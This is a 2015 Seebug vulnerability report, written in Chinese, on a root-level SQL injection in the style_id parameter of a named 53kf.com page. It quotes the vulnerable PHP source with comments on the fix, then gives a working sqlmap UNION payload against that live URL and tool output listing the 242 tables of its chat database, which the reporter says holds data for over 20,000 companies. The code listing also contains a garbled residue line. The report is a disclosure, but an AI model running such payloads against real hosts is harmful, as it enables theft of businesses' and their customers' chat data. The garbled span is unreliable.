53kf某处root权限SQL注入

2015-01-20T00:00:00
ID SSV:94387
Type seebug
Reporter Root
Modified 2015-01-20T00:00:00

Description

简要描述:

53kf某处root权限SQL注入

详细说明:

漏洞url为 http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn ，问题参数为style_id，数字型注入，支持union查询。

<img src="https://images.seebug.org/upload/201501/1922472181cdf8d920c1a0de8e755e8637ca01d6.jpg" alt="531.jpg" width="600" onerror="javascript:errimg(this);">

看看可以loadfile,以下是存在注入的这个php文件源码 <?php
// iframe_brief.php (as reproduced in the advisory): reads style_id and language
// from the query string, fetches the "company_notes" config value for that style
// id and renders it through the iframe_brief.htm template.
define("IN_OK",true);
require_once('include/global.php');

$style_id = get_value("style_id");
$language = get_value("language");
$notes = "";
// Injection point: $style_id comes from $_GET (through get_value/filterSQL) and is
// concatenated into the statement unquoted and without an integer cast, so the
// value can alter the query itself (the UNION extraction shown later on this page).
// filterSQL() lives in include/global.php and is not visible here; whatever it
// strips, the mitigation is to force the expected type or bind the value, e.g.
// `where style_id=".(int)$style_id."` or a prepared statement with a parameter.
$sql = "select config_value from company_config where style_id=".$style_id." and config_id='company_notes' and company_id!=0";
$notes = db_query11($sql);
if($notes!="") {
    $notes = matchQQ($notes);
}
$tpl->assign("notes", $notes);
$tpl->display("iframe_brief.htm");

// Receive the value of $_GET[].
// Returns $re unchanged when the key is absent or blank after trim(); otherwise
// returns filterSQL() applied to the raw value. filterSQL() is not shown here, so
// nothing on this page establishes what it removes.
function get_value($get_name, $re="") {
    if(isset($_GET[$get_name]) && trim($_GET[$get_name])!="") {
        $re = filterSQL($_GET[$get_name]);
    }
    return $re;
}

// Parse QQ123456: replace "qq<digits>" tokens with a clickable QQ image tag.
// The tooltip text is picked by the global $language; any value other than
// cn/tw falls through to the English string. The image host comes from the
// global $master_host. NOTE: the listing is cut off mid-function on the source
// page; the end of matchQQ (including its return) is not visible here.
function matchQQ($str) {
    global $language, $master_host;
    title = "";   // as printed on the page; presumably "$title" lost its "$" in extraction
    if($language=="cn") {
        $title = "点击跟我QQ聊";
    } else if($language=="tw") {
        $title = "點擊跟我QQ聊";
    } else if($language=="en") {
        $title = "Click to chat with me";
    } else {
        $title = "Click to chat with me";
    }
    // $1 is restricted to [0-9]+ by the pattern, so only digits reach the onclick attribute.
    $str = preg_replace("/qq([0-9]+)/i","<img border=\"0\" title=\"".$title."\" src=\"http://".$master_host."/img/qq.gif\" onclick=\"addQQ('$1')\" style=\"cursor:pointer\"/>",$str);
    // extraction residue from the source page follows; the original text is not recoverable
    "&WGW&âG7G#°§Ð £ó

漏洞证明:

涉及到大量的数据，涉及到2W+的企业，看看表有多少吧。

Place: GET Parameter: style_id Type: UNION query Title: MySQL UNION query (NULL) - 1 column (custom) Payload: style_id=-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x6b7852584141 4517753,0x71746f6a71)#&language=cn


[22:50:18] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [22:50:18] [INFO] fetching tables for database: 'talk' [22:50:18] [INFO] the SQL query used returns 242 entries [22:50:18] [INFO] starting 10 threads Database: talk [242 tables] +--------------------------------+ | C3P0TestTable | | identity | | module | | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | area_kf | | autoreply | | block_user | | chat_count | | chat_count_201310111524 | | chat_count_result | | chat_nation | | chat_search | | chat_tables | | chat_worker | | company | | company_ad | | company_config | | company_etel | | company_style | | company_tinet | | company_tinet_cno | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | counter | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | cus_web_msg | | customer | | cyy | | cyy_group | | daemonlog_recv | | daemonlog_send | | disconnect_statistics | | download_job | | email | | err_infos | | err_infos_kf | | etel_logo | | face | | file | | identity_role_id | | ill_words | | image | | imessage | | inner_identity | | kf_group | | kf_group_newthing | | kf_group_upload | | kf_share | | link | | login_off | | logo | | logsql | | mail_template | | mailqueue | | message | | message_buffer | | message_d1 | | message_d10 | | message_d11 | | message_d12 | | message_d13 | | message_d14 | | message_d15 | | message_d16 | | message_d17 | | message_d18 | | message_d19 | | message_d2 | | message_d20 | | message_d21 | | message_d22 | | message_d23 | | message_d24 | | message_d25 | | message_d26 | | message_d27 | | message_d28 | | message_d29 | | message_d3 | | message_d30 | | message_d31 | | message_d32 | | message_d33 | | message_d34 | | message_d35 | | message_d36 | | message_d37 | | message_d38 | | message_d39 | | message_d4 | | message_d40 | | message_d41 | | message_d42 | | message_d43 | | message_d44 | | message_d45 | | message_d46 
| | message_d47 | | message_d48 | | message_d49 | | message_d5 | | message_d50 | | message_d51 | | message_d52 | | message_d53 | | message_d6 | | message_d7 | | message_d8 | | message_d9 | | module_new | | module_special | | module_style_num_bak | | msg_reply | | operate_log | | quality_tj | | robot | | robot_hot | | robot_mem | | room_message | | sms_config | | sms_lword | | sph_counter | | sql_sync | | stat_keyword_month | | stat_place | | stat_search | | stat_to | | statistic | | statistic_from | | statistic_mobile | | statistic_nation | | statistic_net | | statistic_place | | sync_cus_user | | sync_worker_stat | | sys_notify | | talk_evalu | | talk_his | | talk_his_buffer | | talk_his_d1 | | talk_his_d10 | | talk_his_d11 | | talk_his_d12 | | talk_his_d13 | | talk_his_d14 | | talk_his_d15 | | talk_his_d16 | | talk_his_d17 | | talk_his_d18 | | talk_his_d19 | | talk_his_d2 | | talk_his_d20 | | talk_his_d21 | | talk_his_d22 | | talk_his_d23 | | talk_his_d24 | | talk_his_d25 | | talk_his_d26 | | talk_his_d27 | | talk_his_d28 | | talk_his_d29 | | talk_his_d3 | | talk_his_d30 | | talk_his_d31 | | talk_his_d32 | | talk_his_d33 | | talk_his_d34 | | talk_his_d35 | | talk_his_d36 | | talk_his_d37 | | talk_his_d38 | | talk_his_d39 | | talk_his_d4 | | talk_his_d40 | | talk_his_d41 | | talk_his_d42 | | talk_his_d43 | | talk_his_d44 | | talk_his_d45 | | talk_his_d46 | | talk_his_d47 | | talk_his_d48 | | talk_his_d49 | | talk_his_d5 | | talk_his_d50 | | talk_his_d51 | | talk_his_d52 | | talk_his_d53 | | talk_his_d6 | | talk_his_d7 | | talk_his_d8 | | talk_his_d9 | | talk_his_delete | | talk_his_temp | | talk_id | | talk_quality | | talk_subject | | talk_theme | | talk_vote | | talk_weixin | | temp_download_2talk_his | | temp_download_chat_nation | | temp_download_chat_worker | | temp_download_cus_user | | temp_download_imessage | | temp_download_message | | temp_download_stat_place | | temp_download_statistic | | temp_download_statistic_from | | temp_download_statistic_nation 
| | temp_download_statistic_net | | temp_download_statistic_place | | temp_download_talk_his | | temp_download_worker | | v5_company_config | | visitor_lnk | | visitor_trace | | visitor_trace_old0730 | | wechat_guest | | weixin_config | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | zsk_category | | zsk_key | | zsk_noanswer | | zsk_question | +--------------------------------+